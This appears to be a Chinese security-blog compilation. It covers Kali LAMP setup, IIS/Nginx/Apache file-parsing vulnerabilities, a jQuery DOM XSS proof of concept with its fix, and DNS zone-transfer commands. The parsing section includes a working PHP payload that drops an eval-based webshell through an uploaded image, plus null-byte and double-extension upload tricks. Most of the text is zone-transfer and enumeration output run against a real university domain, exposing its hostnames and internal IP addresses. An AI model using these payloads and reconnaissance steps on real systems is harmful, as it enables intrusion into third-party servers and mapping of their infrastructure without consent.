Kali 下使用lamp(PHP+MYSQL)

Kali默认已经安装好 apache mysql php,php版本为 5.4.45

service apache2 start #启动apache,默认路径为 /var/www/ 根目录
service mysql start#启动mysql ,默认路径为 /var/lib/mysql/mysql/,错误日志目录/var/log/mysql.err

默认mysql root账户密码为空,需要用一下命令修改下密码
/usr/bin/mysqladmin -u root password root

命令说明
usr/bin/mysqladmin -u root password ‘new-password’
格式:mysqladmin -u用户名 -p旧密码 password 新密码,上面密码为空-p旧密码可以不写。

测试mysql是否正常使用命令如下:
mysql -u root -p #输入后会提示输入密码 Enter password:
输错密码会提示:ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
如果输入正确会进入mysql,参数如下:

For information about MySQL products and services, visit:
http://www.mysql.com/
For developer information, including the MySQL Reference Manual, visit:
http://dev.mysql.com/
To buy MySQL Enterprise support, training, or other products, visit:
https://shop.mysql.com/

List of all MySQL commands:
Note that all text commands must be first on line and end with ‘;’
????????? (\?) Synonym for `help’.
clear???? (\c) Clear the current input statement.
connect?? (\r) Reconnect to the server. Optional arguments are db and host.
delimiter (\d) Set statement delimiter.
edit????? (\e) Edit command with $EDITOR.
ego?????? (\G) Send command to mysql server, display result vertically.
exit????? (\q) Exit mysql. Same as quit.
go??????? (\g) Send command to mysql server.
help????? (\h) Display this help.
nopager?? (\n) Disable pager, print to stdout.
notee???? (\t) Don’t write into outfile.
pager???? (\P) Set PAGER [to_pager]. Print the query results via PAGER.
print???? (\p) Print current command.
prompt??? (\R) Change your mysql prompt.
quit????? (\q) Quit mysql.
rehash??? (\#) Rebuild completion hash.
source??? (\.) Execute an SQL script file. Takes a file name as an argument.
status??? (\s) Get status information from the server.
system??? (\!) Execute a system shell command.
tee?????? (\T) Set outfile [to_outfile]. Append everything into given outfile.
use?????? (\u) Use another database. Takes database name as argument.
charset?? (\C) Switch to another charset. Might be needed for processing binlog with multi-byte charsets.
warnings? (\W) Show warnings after every statement.
nowarning (\w) Don’t show warnings after every statement.

For server side help, type ‘help contents’

WEB解析漏洞汇总

IIS解析漏洞

1.目录解析:/info.php/info.gif??? #/info.php/目录下文件都被解析为可执行php脚本
2.文件解析:info.php;.gif??? #IIS6.0之前 ; 号后的不被解析,故解析为info.php,(.asa,.cer,.cdx都是IIS6.0可执行脚本扩展名)
IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
在默认Fast-CGI开启状况下,上传一个名字为wooyun.jpg,内容为
<?PHP fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[cmd])?>’);?>
然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php
Nginx <8.03?空字节代码执行漏洞
Nginx在图片中嵌入PHP代码然后通过访问:xxx.jpg%00.php

Apache解析漏洞
Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.
比如 wooyun.php.owf.rar “.owf”和”.rar”?这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.
如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀。

PHP CGI解析漏洞 && Nginx解析漏洞
1.jpg/*.php 解析为php文件执行

Jquery dom xss跨站POC及修复

下载了jQuery JavaScript Library v1.6.1这个库。
用过下面代码引入jquery库验证 dom xss

<html>
<head>
<title>jQuery DomXSS test</title>
<script type="text/javascript"src="jquery.min.js"></script>
<script>
<!-- 标记html#par,传入的par会在页面中显示 -->
$(location.hash)
</script>
</head>
<body>
Hello,jQuery.
<p>测试URL:   1.html#foo<img src=1 onerror=alert(111111111111111111)></p>
</body>
</html>

直接在url中加入#foo<img src=1 onerror=alert(111111111111111111)></p>,或者把url放入页面中都可以触发。当图片发生错误的时候激活onerror事件。
修复:
/^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/, 改为 /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/, 仔细看第一个正则与第二个的区别,其实是把^<改成了^#<,也就是开始是只匹配<,修改后也是匹配到了#<。
 

Kali DNS 域传送漏洞 三个常用命令

1.利用dnswalk命令:dnswalk cqjtu.edu.cn.(注意后面加.)

root@0535coder:~# dnswalk cqjtu.edu.cn.
defined(@array) is deprecated at /usr/bin/dnswalk line 61.
(Maybe you should just omit the defined()?)
Checking cqjtu.edu.cn.
BAD: cqjtu.edu.cn. has only one authoritative nameserver
Getting zone transfer of cqjtu.edu.cn. from dns1.cqjtu.edu.cn…done.
SOA=dns1.cqjtu.edu.cn?? ?contact=root.cqjtu.edu.cn
WARN: applmathmech.cqjtu.edu.cn A 218.194.173.11: no PTR record
WARN: clzx.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: cqjths.cqjtu.edu.cn A 218.194.167.205: no PTR record
WARN: cwcx.cqjtu.edu.cn A 218.194.173.30: no PTR record
WARN: cy.cqjtu.edu.cn A 218.194.173.14: no PTR record
WARN: cyw.cqjtu.edu.cn A 218.194.173.14: no PTR record
WARN: dqlab.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: jdhq.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: jxjyxy.cqjtu.edu.cn A 218.194.173.12: no PTR record
WARN: kjgx.cqjtu.edu.cn A 218.70.34.236: no PTR record
WARN: lmsj.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: lx.cqjtu.edu.cn A 218.194.173.131: no PTR record
WARN: lxzx.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: map.cqjtu.edu.cn A 202.202.240.186: no PTR record
WARN: mbte.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: meeting.cqjtu.edu.cn A 218.194.173.26: no PTR record
WARN: niwrerc.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: qks.cqjtu.edu.cn A 218.194.173.20: no PTR record
WARN: sgjz.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: skb.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: slsy.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: slsyzx.cqjtu.edu.cn A 218.194.173.18: no PTR record
WARN: sqjcsys.cqjtu.edu.cn A 202.202.240.123: no PTR record
WARN: szb.cqjtu.edu.cn A 218.194.173.18: no PTR record
WARN: tyb.cqjtu.edu.cn A 218.194.173.4: no PTR record
WARN: vod3.cqjtu.edu.cn A 202.202.240.73: no PTR record
WARN: vpn.cqjtu.edu.cn A 218.70.34.235: no PTR record
WARN: weboa.cqjtu.edu.cn A 202.202.244.131: no PTR record
WARN: weixin.cqjtu.edu.cn A 218.194.173.23: no PTR record
WARN: wsjf.cqjtu.edu.cn A 218.194.173.5: no PTR record
WARN: xbskb.cqjtu.edu.cn A 218.194.173.20: no PTR record
WARN: xbzk.cqjtu.edu.cn A 218.194.173.20: no PTR record
WARN: xgb.cqjtu.edu.cn A 218.194.173.25: no PTR record
WARN: xgxt.cqjtu.edu.cn A 218.194.173.25: no PTR record
WARN: xlzx.cqjtu.edu.cn A 218.194.173.25: no PTR record
WARN: xqbd.cqjtu.edu.cn A 202.202.240.193: no PTR record
WARN: xwcb.cqjtu.edu.cn A 218.194.173.16: no PTR record
WARN: yjszswap.cqjtu.edu.cn A 218.194.173.23: no PTR record
WARN: yx.cqjtu.edu.cn A 218.194.173.131: no PTR record
WARN: yxm.cqjtu.edu.cn A 218.194.173.138: no PTR record
WARN: zhanqun.cqjtu.edu.cn A 202.202.240.15: no PTR record
0 failures, 41 warnings, 1 errors.

2.利用dig命令(先获取ns记录dig +noall +answer cqjtu.edu.cn ns,再选择NS记录执行区域传输? dig +noall +answer @dns1.cqjtu.edu.cn. cqjtu.edu.cn axfr)

root@0535coder:~# dig +noall +answer cqjtu.edu.cn? ns
cqjtu.edu.cn.?? ??? ?43257?? ?IN?? ?NS?? ?dns1.cqjtu.edu.cn.
root@0535coder:~# dig +noall +answer @dns1.cqjtu.edu.cn. cqjtu.edu.cn axfr
cqjtu.edu.cn.?? ??? ?86400?? ?IN?? ?SOA?? ?dns1.cqjtu.edu.cn. root.cqjtu.edu.cn. 201310501 43200 7200 604800 86400
cqjtu.edu.cn.?? ??? ?86400?? ?IN?? ?MX?? ?10 mail.cqjtu.edu.cn.
cqjtu.edu.cn.?? ??? ?86400?? ?IN?? ?NS?? ?dns1.cqjtu.edu.cn.
007.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.251.136
60th.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
alumni.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
applmathmech.cqjtu.edu.cn. 86400 IN?? ?A?? ?218.194.173.11
at.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
aup.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
automotor.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.12
bbs.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.240
blog.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.251
bridge.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
bt.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.80
bysjxt.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
card.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.12
carlearning.cqjtu.edu.cn. 86400?? ?IN?? ?A?? ?202.202.240.97
cfl.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
civil.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
ckpx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
clxy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
clzx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
cnki.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.12
computer.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
console.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.117
courses.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.17
cqbslab.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
cqjths.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.167.205
cqship.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.12
cwcx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.30
cxy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
cy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.14
cyw.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.14
deyuan.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
disk.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.251
dky.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.251.134
dns1.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.33
donate.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
down.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.247
dqlab.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
dygwh.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
file.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.117
funshu.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
gcgs.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
gh.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
graduate.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.85
huiyuan.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
ids.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.111
imap.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.35
imp.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.111
inrd.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
jbjsc.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
jdhq.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
jdjc.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
jgxy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.8
jingyuan.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
jtys.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
jw.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?10.1.90.3
jxjy2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.255.187
jxjyxy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.12
kjgx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.70.34.236
learning.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.151
lib.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.5
library.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.5
library10.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.10
library2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.2
library3.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.3
library4.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.4
library6.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.6
library7.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.7
lmsj.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
lx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.131
lxzx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
mail.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.35
mail2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.115
mailhost.cqjtu.edu.cn.?? ?86400?? ?IN?? ?CNAME?? ?mail.cqjtu.edu.cn.
mailserver.cqjtu.edu.cn. 86400?? ?IN?? ?CNAME?? ?mail.cqjtu.edu.cn.
map.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.186
math.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
mbte.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
mdwhs.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
meeting.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.26
midc.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
moa.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.29
mobile.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.117
movie.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.249
music.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.247
navigation.cqjtu.edu.cn. 86400?? ?IN?? ?A?? ?202.202.240.7
news.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
nic.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
niwrerc.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
nsrijrc.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
nvsetc.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
nycgge2016.cqjtu.edu.cn. 86400?? ?IN?? ?A?? ?202.202.240.7
oa.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.28
p2p.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.240
pic.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.89
pop.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.35
portal.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.111
postdoctor.cqjtu.edu.cn. 86400?? ?IN?? ?A?? ?202.202.240.7
professor.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
bmtang.professor.cqjtu.edu.cn. 86400 IN?? ?A?? ?202.202.240.7
liulun.professor.cqjtu.edu.cn. 86400 IN?? ?A?? ?202.202.240.7
qks.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.20
qlgczx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
radio.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.254
remote.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.4
rwxy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
sfsd.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?10.8.135.253
sgjz.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
shop.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.240
sjjxxt.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.202
skb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
slsy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
slsyzx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.18
smtp.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.35
smve.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
sqjcsys.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.123
stat.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.252
szb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.18
test.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.251.135
test2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.251.132
tingting.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.252
tracker248.cqjtu.edu.cn. 86400?? ?IN?? ?A?? ?202.202.240.248
tran.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.8
ty.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.254
tyb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.4
tydown1.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.76
tydown2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.75
ume.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.231
uss.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.152
v1.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.11
v2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.20
video.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.90
vip.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.12
virus.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.55
vod.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.249
vod1.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.71
vod2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.72
vod3.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.73
vod4.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.74
vod86.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.86
vod88.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.88
vpn.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.70.34.235
webmail.cqjtu.edu.cn.?? ?86400?? ?IN?? ?CNAME?? ?mail.cqjtu.edu.cn.
weboa.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.244.131
weixin.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.23
wsjf.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.5
wtdsc.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
www.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.6
www1.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.8
www2.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
xbskb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.20
xbzk.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.20
xcb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
xfcx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.115
xgb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.25
xgxt.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.25
xks.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
xkx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
xlzx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.25
xqbd.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.193
xwcb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.16
xxgk.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
xz.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.248
yayuan.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
ygb.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
yjszs.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
yjszswap.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.23
yx.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.131
yxm.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?218.194.173.138
zhanqun.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.15
zhiyuan.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.16
zsj.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.111
zsjy.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.251.66
zygcs.cqjtu.edu.cn.?? ?86400?? ?IN?? ?A?? ?202.202.240.7
cqjtu.edu.cn.?? ??? ?86400?? ?IN?? ?SOA?? ?dns1.cqjtu.edu.cn. root.cqjtu.edu.cn. 201310501 43200 7200 604800 86400

3.利用dnsenum枚举和google查询(dnsenum -enum cqjtu.edu.cn.)

root@0535coder:~# dnsenum -enum cqjtu.edu.cn.
dnsenum.pl VERSION:1.2.3
Warning: can’t load Net::Whois::IP module, whois queries disabled.

—–?? cqjtu.edu.cn.?? —–

Host’s addresses:
__________________

Name Servers:
______________

dns1.cqjtu.edu.cn.?????????????????????? 71212??? IN??? A??????? 202.202.240.33

Mail (MX) Servers:
___________________

mail.cqjtu.edu.cn.?????????????????????? 84208??? IN??? A??????? 202.202.240.35

Trying Zone Transfers and getting Bind Versions:
_________________________________________________

Trying Zone Transfer for cqjtu.edu.cn. on dns1.cqjtu.edu.cn …
cqjtu.edu.cn.??????????????????????????? 86400??? IN??? SOA????? dns1.cqjtu.edu.cn.
cqjtu.edu.cn.??????????????????????????? 86400??? IN??? MX?????????????? 10
cqjtu.edu.cn.??????????????????????????? 86400??? IN??? NS?????? dns1.cqjtu.edu.cn.
007.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.251.136
60th.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.7
alumni.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.7
applmathmech.cqjtu.edu.cn.?????????????? 86400??? IN??? A??????? 218.194.173.11
at.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.7
aup.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.16
automotor.cqjtu.edu.cn.????????????????? 86400??? IN??? A??????? 202.202.244.12
bbs.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.240
blog.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.251
bridge.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.7
bt.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.80
bysjxt.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.7
card.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.12
carlearning.cqjtu.edu.cn.??????????????? 86400??? IN??? A??????? 202.202.240.97
cfl.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.16
civil.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.16
ckpx.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.7
clxy.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
clzx.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.4
cnki.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.244.12
computer.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.240.7
console.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.117
courses.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.17
cqbslab.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.7
cqjths.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 218.194.167.205
cqship.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.244.12
cwcx.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.30
cxy.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.7
cy.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 218.194.173.14
cyw.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 218.194.173.14
deyuan.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.16
disk.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.251
dky.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.251.134
dns1.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.33
donate.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.7
down.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.247
dqlab.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 218.194.173.4
dygwh.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.16
file.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.117
funshu.cqjtu.edu.cn.???????????????????? 86400??? IN??? A??????? 202.202.240.7
gcgs.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.7
gh.cqjtu.edu.cn.???????????????????????? 86400??? IN??? A??????? 202.202.240.16
graduate.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.240.85
huiyuan.cqjtu.edu.cn.??????????????????? 86400??? IN??? A??????? 202.202.240.16
ids.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.111
imap.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.35
imp.cqjtu.edu.cn.??????????????????????? 86400??? IN??? A??????? 202.202.240.111
inrd.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.7
jbjsc.cqjtu.edu.cn.????????????????????? 86400??? IN??? A??????? 202.202.240.16
jdhq.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 218.194.173.4
jdjc.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
jgxy.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.8
jingyuan.cqjtu.edu.cn.?????????????????? 86400??? IN??? A??????? 202.202.240.16
jtys.cqjtu.edu.cn.?????????????????????? 86400??? IN??? A??????? 202.202.240.16
